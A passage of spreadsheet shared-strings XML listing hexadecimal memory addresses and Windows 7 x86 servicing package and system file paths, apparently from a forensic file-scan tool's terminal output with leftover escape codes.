  <si>
    <t>5~x86~tr-TR</t>
  </si>
  <si>
    <t>0xde913b98</t>
  </si>
  <si>
    <t>0xde913c50</t>
  </si>
  <si>
    <t>5~x86~el-GR</t>
  </si>
  <si>
    <t>0xde914038</t>
  </si>
  <si>
    <t>5~x86~et-EE</t>
  </si>
  <si>
    <t>0xde914358</t>
  </si>
  <si>
    <t>5~x86~hu-HU</t>
  </si>
  <si>
    <t>0xde914770</t>
  </si>
  <si>
    <t>\Windows\System32\sqlceoledb30.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde914828</t>
  </si>
  <si>
    <t>5~x86~de-DE</t>
  </si>
  <si>
    <t>0xde914b78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>0xde914c30</t>
  </si>
  <si>
    <t>5~x86~es-ES</t>
  </si>
  <si>
    <t>0xde915038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_44_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9153a8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Ribbons.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9156e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde915a68</t>
  </si>
  <si>
    <t>5~x86~zh-HK</t>
  </si>
  <si>
    <t>0xde915d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>0xde915e50</t>
  </si>
  <si>
    <t>5~x86~he-IL</t>
  </si>
  <si>
    <t>0xde916300</t>
  </si>
  <si>
    <t>5~x86~ko-KR</t>
  </si>
  <si>
    <t>0xde916650</t>
  </si>
  <si>
    <t>0xde916708</t>
  </si>
  <si>
    <t>5~x86~hi-IN</t>
  </si>
  <si>
    <t>601.16492.mum_x001B_[0K_x001B_[135G</t>
  </si>
  <si>
    <t>0xde916a58</t>
  </si>
  <si>
    <t>0xde916b10</t>
  </si>
  <si>
    <t>5~x86~ja-JP</t>
  </si>
  <si>
    <t>0xde916f18</t>
  </si>
  <si>
    <t>5~x86~lv-LV</t>
  </si>
  <si>
    <t>0xde917170</t>
  </si>
  <si>
    <t>5~x86~pt-PT</t>
  </si>
  <si>
    <t>0xde917578</t>
  </si>
  <si>
    <t>5~x86~zh-CN</t>
  </si>
  <si>
    <t>0xde917980</t>
  </si>
  <si>
    <t>5~x86~sr-LA</t>
  </si>
  <si>
    <t>TN-CS~</t>
  </si>
  <si>
    <t>7.1.7601.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde917d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde917e50</t>
  </si>
  <si>
    <t>5~x86~lt-LT</t>
  </si>
  <si>
    <t>0xde918038</t>
  </si>
  <si>
    <t>0xde918298</t>
  </si>
  <si>
    <t>5~x86~hr-HR</t>
  </si>
  <si>
    <t>0xde918680</t>
  </si>
  <si>
    <t>5~x86~uk-UA</t>
  </si>
  <si>
    <t>0xde918a68</t>
  </si>
  <si>
    <t>5~x86~da-DK</t>
  </si>
  <si>
    <t>0xde918d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3015428~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde918e50</t>
  </si>
  <si>
    <t>5~x86~sl-SI</t>
  </si>
  <si>
    <t>0xde9191b0</t>
  </si>
  <si>
    <t>5~x86~it-IT</t>
  </si>
  <si>
    <t>0xde9195b8</t>
  </si>
  <si>
    <t>5~x86~zh-TW</t>
  </si>
  <si>
    <t>0xde9198e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteFX-RemoteClient-Setup-LanguagePack~31bf385</t>
  </si>
  <si>
    <t>0xde9199a0</t>
  </si>
  <si>
    <t>5~x86~ru-RU</t>
  </si>
  <si>
    <t>0xde919d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2799926~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde919e50</t>
  </si>
  <si>
    <t>5~x86~sv-SE</t>
  </si>
  <si>
    <t>0xde91a588</t>
  </si>
  <si>
    <t>0xde91a8d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91a990</t>
  </si>
  <si>
    <t>5~x86~cs-CZ</t>
  </si>
  <si>
    <t>0xde91ace0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2799926_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91ad98</t>
  </si>
  <si>
    <t>5~x86~ar-SA</t>
  </si>
  <si>
    <t>0xde91b038</t>
  </si>
  <si>
    <t>0xde91b3c0</t>
  </si>
  <si>
    <t>0xde91b478</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685811_RTM~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91b860</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685811_SP1~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91bcc8</t>
  </si>
  <si>
    <t>0xde91bf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2799926~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91c2b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB976902~31bf3856ad364e35~x86~~6.1.1.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91c368</t>
  </si>
  <si>
    <t>0xde91c6b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde91c770</t>
  </si>
  <si>
    <t>0xde91cac0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_54_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91cb78</t>
  </si>
  <si>
    <t>0xde91cf80</t>
  </si>
  <si>
    <t>0xde91d3a8</t>
  </si>
  <si>
    <t>0xde91d7b0</t>
  </si>
  <si>
    <t>0xde91dae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde91db98</t>
  </si>
  <si>
    <t>0xde91df80</t>
  </si>
  <si>
    <t>0xde91e208</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SecureStartup-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>0xde91e2c0</t>
  </si>
  <si>
    <t>0xde91e6c8</t>
  </si>
  <si>
    <t>0xde91ead0</t>
  </si>
  <si>
    <t>0xde91ee00</t>
  </si>
  <si>
    <t>0xde91eeb8</t>
  </si>
  <si>
    <t>0xde91f258</t>
  </si>
  <si>
    <t>0xde91f5a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2799926~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde91f660</t>
  </si>
  <si>
    <t>0xde91fa68</t>
  </si>
  <si>
    <t>0xde91fd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteFX-RemoteClient-Setup-Package~31bf3856ad36</t>
  </si>
  <si>
    <t>0xde91fe50</t>
  </si>
  <si>
    <t>0xde920170</t>
  </si>
  <si>
    <t>0xde920578</t>
  </si>
  <si>
    <t>0xde9208c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2799926_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde920980</t>
  </si>
  <si>
    <t>0xde920d88</t>
  </si>
  <si>
    <t>0xde921100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2894844_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde921218</t>
  </si>
  <si>
    <t>0xde921568</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-UIComp~31bf3856ad364e35~x86~en-US~7.6.760</t>
  </si>
  <si>
    <t>0xde921620</t>
  </si>
  <si>
    <t>0xde921970</t>
  </si>
  <si>
    <t>0xde921a28</t>
  </si>
  <si>
    <t>.16492.mum_x001B_[0K_x001B_[140G</t>
  </si>
  <si>
    <t>0xde921e30</t>
  </si>
  <si>
    <t>0xde922230</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_122_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9222e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9224f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde922798</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2639308~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde922850</t>
  </si>
  <si>
    <t>0xde9229d0</t>
  </si>
  <si>
    <t>0xde922db8</t>
  </si>
  <si>
    <t>0xde9232a0</t>
  </si>
  <si>
    <t>0xde9236a8</t>
  </si>
  <si>
    <t>0xde9239f8</t>
  </si>
  <si>
    <t>0xde923ab0</t>
  </si>
  <si>
    <t>0xde923f80</t>
  </si>
  <si>
    <t>0xde924168</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-CoreComp~31bf3856ad364e35~x86~~7.6.7600.2</t>
  </si>
  <si>
    <t>0xde924220</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_810_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde924488</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_60_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9246a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_128_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde924760</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_127_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde924b78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde924d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3170735~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde924e50</t>
  </si>
  <si>
    <t>0xde9251b0</t>
  </si>
  <si>
    <t>0xde9255c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde925680</t>
  </si>
  <si>
    <t>0xde9259b0</t>
  </si>
  <si>
    <t>0xde925a68</t>
  </si>
  <si>
    <t>0xde925e50</t>
  </si>
  <si>
    <t>0xde926258</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2685939~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde926660</t>
  </si>
  <si>
    <t>0xde9269b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2653956~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde926a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685939~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde926d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2973201~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde926e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2621440~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde927038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3093513~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde927588</t>
  </si>
  <si>
    <t>0xde927640</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_362_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde927a48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_291_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde927e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde928038</t>
  </si>
  <si>
    <t>0xde928530</t>
  </si>
  <si>
    <t>0xde928860</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2533623~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde928918</t>
  </si>
  <si>
    <t>0xde928cb8</t>
  </si>
  <si>
    <t>0xde929038</t>
  </si>
  <si>
    <t>0xde929370</t>
  </si>
  <si>
    <t>0xde929428</t>
  </si>
  <si>
    <t>0xde929958</t>
  </si>
  <si>
    <t>0xde929d80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde929f80</t>
  </si>
  <si>
    <t>0xde92a038</t>
  </si>
  <si>
    <t>0xde92a408</t>
  </si>
  <si>
    <t>0xde92a880</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_87_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92a938</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2978120~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92aca8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3074543_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92ad60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92b2c0</t>
  </si>
  <si>
    <t>0xde92b610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3170735~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92b6c8</t>
  </si>
  <si>
    <t>0xde92bb98</t>
  </si>
  <si>
    <t>0xde92bf80</t>
  </si>
  <si>
    <t>0xde92c248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde92c300</t>
  </si>
  <si>
    <t>0xde92c650</t>
  </si>
  <si>
    <t>0xde92c708</t>
  </si>
  <si>
    <t>0xde92cb10</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[</t>
  </si>
  <si>
    <t>121G</t>
  </si>
  <si>
    <t>0xde92cf18</t>
  </si>
  <si>
    <t>0xde92d170</t>
  </si>
  <si>
    <t>0xde92d578</t>
  </si>
  <si>
    <t>0xde92d990</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161102_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92da48</t>
  </si>
  <si>
    <t>0xde92de50</t>
  </si>
  <si>
    <t>0xde92e298</t>
  </si>
  <si>
    <t>0xde92e680</t>
  </si>
  <si>
    <t>0xde92ea68</t>
  </si>
  <si>
    <t>0xde92ed98</t>
  </si>
  <si>
    <t>0xde92ee50</t>
  </si>
  <si>
    <t>0xde92f350</t>
  </si>
  <si>
    <t>0xde92f6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3127220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92f900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-HomeGroup-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xde92fc30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_275_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde92fce8</t>
  </si>
  <si>
    <t>0xde930038</t>
  </si>
  <si>
    <t>0xde930578</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xde9308c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TabletPC-OC-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde930980</t>
  </si>
  <si>
    <t>0xde930d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde931038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_279_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9314a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Telnet-Server-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>0xde9318b0</t>
  </si>
  <si>
    <t>0xde931c00</t>
  </si>
  <si>
    <t>0xde931cb8</t>
  </si>
  <si>
    <t>0xde932038</t>
  </si>
  <si>
    <t>0xde9322a8</t>
  </si>
  <si>
    <t>0xde932360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>0xde932828</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde932bf0</t>
  </si>
  <si>
    <t>0xde932f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3170735~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9332d0</t>
  </si>
  <si>
    <t>0xde933388</t>
  </si>
  <si>
    <t>0xde933790</t>
  </si>
  <si>
    <t>0xde933ae0</t>
  </si>
  <si>
    <t>0xde933b98</t>
  </si>
  <si>
    <t>0xde933f80</t>
  </si>
  <si>
    <t>0xde9342a0</t>
  </si>
  <si>
    <t>0xde934770</t>
  </si>
  <si>
    <t>0xde934b78</t>
  </si>
  <si>
    <t>0xde934f80</t>
  </si>
  <si>
    <t>0xde9353b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde935700</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB4040980~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9357b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9359b0</t>
  </si>
  <si>
    <t>0xde935db8</t>
  </si>
  <si>
    <t>0xde9362c0</t>
  </si>
  <si>
    <t>0xde9366c8</t>
  </si>
  <si>
    <t>0xde936ad0</t>
  </si>
  <si>
    <t>0xde936e00</t>
  </si>
  <si>
    <t>0xde936eb8</t>
  </si>
  <si>
    <t>0xde9372f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9376f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wshext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9377a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2978120_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde937880</t>
  </si>
  <si>
    <t>0xde937d50</t>
  </si>
  <si>
    <t>0xde937f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2653956~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde938038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde9381a0</t>
  </si>
  <si>
    <t>0xde9384f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~x86~~6.1.7601</t>
  </si>
  <si>
    <t>0xde9385a8</t>
  </si>
  <si>
    <t>0xde9389b0</t>
  </si>
  <si>
    <t>0xde938db8</t>
  </si>
  <si>
    <t>0xde939100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2894844~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde939588</t>
  </si>
  <si>
    <t>0xde939990</t>
  </si>
  <si>
    <t>mum_x001B_[0K_x001B_[133G</t>
  </si>
  <si>
    <t>0xde939d98</t>
  </si>
  <si>
    <t>0xde93a2d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SNMP-Package~31bf3856ad364e35~x86~~6.1.7601.1751</t>
  </si>
  <si>
    <t>0xde93a388</t>
  </si>
  <si>
    <t>0xde93a790</t>
  </si>
  <si>
    <t>0xde93ab98</t>
  </si>
  <si>
    <t>0xde93af80</t>
  </si>
  <si>
    <t>0xde93b3a8</t>
  </si>
  <si>
    <t>0xde93b7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93bb10</t>
  </si>
  <si>
    <t>0xde93bf18</t>
  </si>
  <si>
    <t>0xde93c2c0</t>
  </si>
  <si>
    <t>0xde93c6c8</t>
  </si>
  <si>
    <t>0xde93cb98</t>
  </si>
  <si>
    <t>0xde93cf80</t>
  </si>
  <si>
    <t>0xde93d240</t>
  </si>
  <si>
    <t>0xde93d628</t>
  </si>
  <si>
    <t>0xde93db58</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2978120~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93dec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3037574~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93df80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93e218</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde93e620</t>
  </si>
  <si>
    <t>0xde93e970</t>
  </si>
  <si>
    <t>0xde93ea28</t>
  </si>
  <si>
    <t>0xde93ee30</t>
  </si>
  <si>
    <t>0xde93f100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2972211~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93f1f8</t>
  </si>
  <si>
    <t>0xde93f600</t>
  </si>
  <si>
    <t>0xde93f950</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde93fa08</t>
  </si>
  <si>
    <t>0xde93fdf0</t>
  </si>
  <si>
    <t>0xde940038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9407b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_60_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde940868</t>
  </si>
  <si>
    <t>0xde940c50</t>
  </si>
  <si>
    <t>0xde941100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~x86~~6.1.7601.17</t>
  </si>
  <si>
    <t>0xde9414c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde941990</t>
  </si>
  <si>
    <t>0xde941d98</t>
  </si>
  <si>
    <t>0xde942388</t>
  </si>
  <si>
    <t>0xde942790</t>
  </si>
  <si>
    <t>0xde942b98</t>
  </si>
  <si>
    <t>0xde942ec8</t>
  </si>
  <si>
    <t>0xde942f80</t>
  </si>
  <si>
    <t>0xde9431e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SampleContent-Music-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>~~6.1.7601.17</t>
  </si>
  <si>
    <t>0xde9432a0</t>
  </si>
  <si>
    <t>0xde943770</t>
  </si>
  <si>
    <t>0xde943b78</t>
  </si>
  <si>
    <t>0xde943f80</t>
  </si>
  <si>
    <t>0xde944238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2978742_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde944640</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2978742~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde944a48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2631813~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde944e50</t>
  </si>
  <si>
    <t>0xde9450d0</t>
  </si>
  <si>
    <t>0xde945188</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~x86~~6.1.7601</t>
  </si>
  <si>
    <t>0xde945240</t>
  </si>
  <si>
    <t>0xde9456b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3127220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde945770</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde945a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_685_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde945ad0</t>
  </si>
  <si>
    <t>0xde945e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2978742~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde946170</t>
  </si>
  <si>
    <t>0xde946578</t>
  </si>
  <si>
    <t>0xde946980</t>
  </si>
  <si>
    <t>0xde946e50</t>
  </si>
  <si>
    <t>0xde947218</t>
  </si>
  <si>
